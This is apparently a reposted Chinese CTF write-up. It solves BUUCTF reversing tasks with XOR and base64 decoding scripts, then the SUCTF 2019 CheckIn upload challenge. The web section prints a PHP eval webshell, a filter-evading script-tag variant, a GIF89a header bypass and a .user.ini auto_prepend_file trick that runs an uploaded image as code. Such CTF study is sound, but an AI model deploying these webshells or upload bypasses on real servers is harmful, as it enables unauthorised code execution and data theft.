buuctf re(二)+ web CheckIn

news2024/9/28 9:30:21

目录

re

   xor

   helloword

   reverse3

web

   SUCTF 2019 CheckIn


xor

1.查壳

64位,无壳

2.ida,f5查看伪代码

 3.跟进global

dq是八个字节,汇编数据类型参考汇编语言---基本数据类型_汇编db类型_wwb0111的博客-CSDN博客

4.因为global变量里有一部分16进制的整数和一部分的字符串,所以需要手工调整一下。得到global的值

shift+e提取出数据,转换成十六进制

 5.写个脚本

key=[0x66,0x0A,0x6B,0x0C,0x77,0x26,0x4F,0x2E,0x40,0x11,0x78,0x0D,0x5A,0x3B,0x55,0x11,0x70,0x19,0x46,0x1F,0x76,0x22,0x4D,0x23,0x44,0x0E,0x67,0x06,0x68,0x0F,0x47,0x32,0x4F]
flag =''
for i in range(32,0,-1):
    key[i]=(key[i]^key[i-1])
for i in range(33):
    flag+=chr(key[i])
print(flag)

 flag{QianQiuWanDai_YiTongJiangHu}

helloword

是一道安卓逆向题目

需要下载apkIDE

然后打开main函数,就找到flag

reverse3

 1.查壳 32位无壳

 2.shift+f12查看字符串

 一个base64编码表,一个含有flag函数,base64编码原理及解码脚本参考一篇文章彻底弄懂Base64编码原理_程序新视界的博客-CSDN博客

3,查看main主函数

从下往上看

 

v5为Des(为了简洁后面把Destination叫为Des)的长度

strncmp(Destination,str2,v5)是把Destination与str2两字符串的前v5位数做一个比较,若Destination=str2,返回0;大于返回正数,小于返回负数

if(!strncmp(Destination,str2,v5))是一个判断语句

destination与str2如果相等,就会输出正确的flag

所以Str2为flag经过变换后的字符串,点进去看看

看上面

由一个函数得到的v4复制给destination

 

 由一个函数得到的v4复制给destination,然后对destination做了一个for循环运算,此处为对destination做的一次变化。

变化为:假设Des长度为10,则第一次循环:Des[0]+0  第二次为:Des[1] +1

第22行的函数显然是输入函数,Str为你输入的flag,23行v3是flag的长度,然后关键点就在第24行的函数sub_4110BE对Str做的变换上,点进该函数查看是什么变换 

继续点进去

 

 看到"/3""和*4"猜测是base64对字符的二进制编码做的处理,这是定义了v9和v10来存放base64对字符的二进制变化;倘若不确定,继续往下看

一个if判断,两个循环while,switch(别的题目中也可能是for循环、do循环)结合前面的猜测实锤了函数是base64加密

然后正向总结一下思路:输入了一个Str字符串,然后对字符串做了一个base64加密,该加密的值赋给了v4,v4被赋给了Des,Des做了一个for循环,该循环对Des做了变化,最后倘若Des与Str2相等则输出正确的flag

所以写解密脚本思路为:将Str2逆向还原为Des,再对Des做base64解码

import base64
 
Des="e3nifIH9b_C@n@dH"
flag=""
 
for i in range(len(Des)):
    flag+=chr(ord(Des[i])-i)
print(base64.b64decode(flag))
 

外包flag

SUCTF 2019 CheckIn 

1 好像是一道文件上传题目,

上传一个php文件,里面写一个最简单的一句话木马

<?php eval(@$_POST['a']);?>

 

 回显illegal suffix!(非法后缀)

这里尝试一下修改文件拓展名php5,phtml,等都没有成功。进行抓包,修改content-type,都是回显的illegal suffix!(非法后缀)

2.上传一张jpg

回显<? in contents!   说明不能有<?

那这里就清晰了,修改一下一句话木马使得一句话木马没有<?

<script language='php'>eval($_POST['a']);<scirpt>

回显exif_imagetype:not image!

这里使用exif_imagetype函数来判断是否是jpg文件,这里使用添加gif文件头GIF89a就能进行绕过

这里成功上传

3.尝试上传一个.htaccess文件将jpg文件变成php文件执行

这里在1.txt文件中写入

AddType application/x-httpd-php .jpg

4.在1.txt的文件中打开cmd,输入ren 1.txt .htaccess,这样来生成.htaccess

然后将.htaccess上传。回显exif_imagetype:not image!

说明不行。这里由于上传成功的时候会出现index.php,所以这里使用的是.user.ini

.user.ini


自PHP5.3.0起,PHP支持基于每个目录的.htaccess风格的IN/文件。此类文件仅被CGl /FastCGl SAPI处理。此功能使得PECL的 htscanner扩展作废。如果使用Apache,则用.htaccess文件有同样效果。
除了主php.ini 之外,PHP还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVERL’DOCUMENT_RO0T’]所指定的)。如果被执行的PHP文件在web根目录之外,则只扫描该目录。
在.user.ini风格的INl文件中只有具有 PHP_INI_PERDIR和PHP_INI_USER模式的INI设置可被识别。
两个新的INI指令,user_ini.filename和user_ini.cache_ttl控制着用户INI文件的使用。
user_inifilename设定了 PHP会在每个目录下搜寻的文件名;如果设定为空字符串则PHP不会搜寻。默认值是.user.ini。user_ini.cache_ttl控制着重新读取用户INl文件的间隔时间。默认是300秒(5分钟)。

这里的意思就是说我们在.user.ini中设置php.ini中PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置,只要是使用CGI/FastCGI模式的服务器都可以使用.user.ini

这里使用的是auto_prepend_file和auto_append_file

auto_prepend_file:指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。就是我们指定一个文件(比如teng.jpg),那么teng.jpg就会被包含在要执行的php文件中(比如index.php),就相当于在index.php中插入了一句require(./teng.jpg),不过需要注意的就是上传目录下必须要有可执行的php文件
auto_append_file:和auto_append_file类似,只是在文件后面包含,跟include()函数类似
他们的作用就是指定一个文件(3.jpg),那么该文件就会被包含在要执行的php文件中(index.php)。

5.先上传一个.user.ini

GIF89a
auto_prepend_file=3.jpg

6.上传一个图片马。文件名为3.jpg

GIF89a
<script language='php'>system('cat /flag');</script>

index.php通过配置文件.user.ini让index.php对3.jpg进行文件包含,3.jpg里面的内容就以php代码执行,于是getshell

auto_prepend_file是在文件前插入;auto_append_file在文件最后插入(当文件调用的有exit()时该设置无效)

7.访问 /uploads/f9e1016a5cec370aae6a18d438dabfa5/index.php

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/688246.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

多商户商城有哪些功能和优势?-加速度jsudo

电商时代下&#xff0c;传统企业商家急需拓展业务规模&#xff0c;向线上拓展&#xff0c;而多商户小程序造价低&#xff0c;效应高&#xff0c;自然就成为了很多企业商家拓展线上营销渠道的首要选择,那么多商户小程序商城涵盖哪些功能呢?下面小编就来详细为大家解答&#xff…

UE5《Electric Dreams》项目PCG技术解析 之 理解Assembly(以SplineExample为例)

文章目录 1. 什么是Assembly2. PCG部分2.1 Assembly变换2.2 Point变换2.2.1. SG_CopyPointsWithHierachy2.2.2 过滤及点变换2.2.3. ApplyHierachy 3. 小结 1. 什么是Assembly UE5.2的PCG出了有一段时间了&#xff0c;大家玩得都很开心。很多朋友可能和老王一样&#xff0c;使用…

Rust语言从入门到入坑——(10)文件与IO

文章目录 0、引入1、命令行1.1 命令行参数1.2 命令行输入 2、文件操作2.1 读取文件2.2 写入文件 3、总结 0、引入 Rust 语言的 I/O 操作&#xff0c;最基本的交互模式&#xff0c;主流语言都具备的功能。 1、命令行 1.1 命令行参数 命令行程序是计算机程序最基础的存在形式&…

B050-cms05-轮播图 cookie session 登录

目录 轮播图修改操作删除操作查询并展示所有轮播图 无状态的HTTP协议CookieCookie的原理Cookie的创建获取Cookie更新Cookie设置cookie的声明周期设置cookie访问路径Cookie优缺点 SessionSession原理创建SessionSession的使用sesion的生命周期Session的优缺点Cookie和Session的区…

定积分计算—牛顿-莱布尼兹公式、定积分的几何意义、利用奇偶性化简、利用Wallis公式

定积分计算 前言定积分的常规计算技巧—牛顿-莱布尼茨公式定积分的几何意义利用奇偶性简化计算![在这里插入图片描述](https://img-blog.csdnimg.cn/9acfec48362141ba9486630f7060d78d.jpg)利用周期性平移和缩小积分区间利用Wallis公式利用一个常见的积分公式定积分计算练习题 …

yolov8 -01 部署

本想去配环境的步骤&#xff0c;在之前yolov5运行的环境下&#xff0c;试predict yolov8&#xff0c;竟然报错。 与其改bug, 选择重头来。 1. conda 创建新环境 yolo 8 conda create -n yolo82. 官网下载资料 官网下载yolo8相关资料 https://github.com/ultralytics/ultraly…

Flutter 检查连接网络 connectivity_plus

Flutter 检查连接网络 connectivity_plus 前言 有些对通讯敏感的程序&#xff0c;我们需要检查当前连接的网络情况。 我推荐使用 connectivity_plus https://pub-web.flutter-io.cn/packages/connectivity_plus 这个插件的好处就是支持全平台&#xff0c;这点非常好。 我们今天…

socketio连接失败,nginx返回502 connect() failed (111: Connection refused)

现象 我们信控平台&#xff0c;需要实时展示信号灯灯态&#xff08;红黄绿、倒计时等&#xff09; 当灯态变化时&#xff0c;前端信号机设备会通过socket协议将消息推送给我们的通信服务&#xff0c;通信服务将消息解析处理后&#xff0c;关联路口信息&#xff0c;再把信息通过…

数据库监控与调优【四】—— EXPLAIN详解

EXPLAIN详解&#xff08;使用、可视化、扩展与性能计算公式&#xff09; TIPS 本文基于MySQL 8.0编写&#xff0c;理论支持MySQL 5.0及更高版本。 什么是EXPLAIN命令 EXPLAIN命令是查看MySQL查询优化器如何执行查询的主要方法&#xff0c;可以很好地分析SQL语句的执行情况。每…

MPLS新手排查丢包问题

借助查问题又重新复习了一下mpls协议&#xff0c;首先复习一下它的报文格式&#xff1a; 0---------------19-------22---23------------31 | Label value | Exp | Bos | TTL | -----------------|---------|-------|-------------| 字段意义&#xff1a; Label v…

全网最新超详细的【Axure】Axure RP 10的下载、安装、中文字体、授权【2023年】

文章目录 1. 文章引言2. 下载Axure103. 安装Axure104. Axure10中文5. 解决axure弹框更新的问题6. 重要备注7. Axure10授权 1. 文章引言 最近在学习原型图&#xff0c;针对画原型图的工具&#xff0c;反复对比墨刀、Axure、xiaopiu后&#xff0c;最终选择了Axure。 接下来&…

ansible自动化IT工具安装部署与使用验证

目录 一、环境配置 1、关闭防火墙 2、免密登录配置 3、同步时区 二、服务端配置 1、安装软件 2、查看版本 3、实现远程控制huyang3 4、测试 结果验证&#xff1a; 一、环境配置 1、关闭防火墙 systemctl stop firewalld iptables -F setenforce0 2、免密登录配置 【huy…

二叉树题目:二叉树展开为链表

文章目录 题目标题和出处难度题目描述要求示例数据范围进阶 解法一思路和算法代码复杂度分析 解法二思路和算法代码复杂度分析 解法三思路和算法代码复杂度分析 后记 题目 标题和出处 标题&#xff1a;二叉树展开为链表 出处&#xff1a;114. 二叉树展开为链表 难度 3 级 …

8 从0开始学PyTorch | PyTorch中自动计算梯度、使用优化器

上一节&#xff0c;我们写了很多代码&#xff0c;但是不知道你有没有注意&#xff0c;那些代码看起来跟PyTorch关系并不是很大啊&#xff0c;貌似很多都是Python原生代码&#xff1f; 如果你是这样的感觉&#xff0c;那我要告诉你&#xff0c;你感觉的没有错。前面主要在于机制…

下面告诉你音频转换工具有哪些

今天我想和大家聊一聊音频转换工具。你是不是有时候想把一首酷炫的歌曲转换成你喜欢的音频格式&#xff0c;或者想把录音文件转成可编辑的格式&#xff1f;别担心&#xff0c;这里有一些超赞的音频转换工具&#xff0c;可以帮你解决这些问题&#xff01;无论是从MP3到WAV&#…

武汉大学计算机考研分析

关注我们的微信公众号 姚哥计算机考研 更多详情欢迎咨询 武汉大学&#xff08;A-&#xff09;考研难度&#xff08;☆☆☆☆☆&#xff09; 武汉大学计算机考研招生学院是计算机学院、国家网络安全学院和测绘遥感信息工程国家重点实验室。目前均已出拟录取名单。 武汉大学计…

Redis的3大特殊数据类型(1)-BitMap

BitMap(位图/位数组)是Redis2.2.0版本中引入的一种新数据类型&#xff0c;该数据类型本质是一个仅含0和1的二进制字符串。因此可以把 Bitmap 想象成一个以位为单位的数组&#xff0c;数组的每个单元只能存储 0 和 1&#xff0c;数组的下标在 Bitmap 中叫做偏移量 offset&#x…

volatile关键字和ThreadLocal

作用&#xff1a; 1.线程的可见性&#xff1a;当一个线程修改一个共享变量时&#xff0c;另外一个线程能读到这个修改的值。 2. 顺序一致性&#xff1a;禁止指令重排序。 线程之间的共享变量存储在主内存中&#xff08;Main Memory&#xff09;中&#xff0c;每个线程都一个都…

StarRocks Friends 上海站活动回顾(含 PPT 下载链接)

6月17日&#xff0c; StarRocks & Friends 上海站活动如期而至&#xff0c;近百位社区小伙伴参与交流活动&#xff1b;针对 StarRocks 存算分离、StarRocks 在业界的应用实践、以及 StarRocks 与 BI 结合、湖仓一体规划等话题展开激烈的交流互动。 本文总结了技术交流活动…

未来的彩电,彩电的未来

疫情后的首个线上大促已经结束&#xff0c;“史上投入最大618”也没能抵住彩电市场整体的需求疲软。 根据奥维云网线上推总数据&#xff0c;2023年618期间&#xff0c;中国彩电线上市场零售量规模为249.9万台&#xff0c;同比下降12.9%&#xff1b;零售额规模为79.7亿元&#…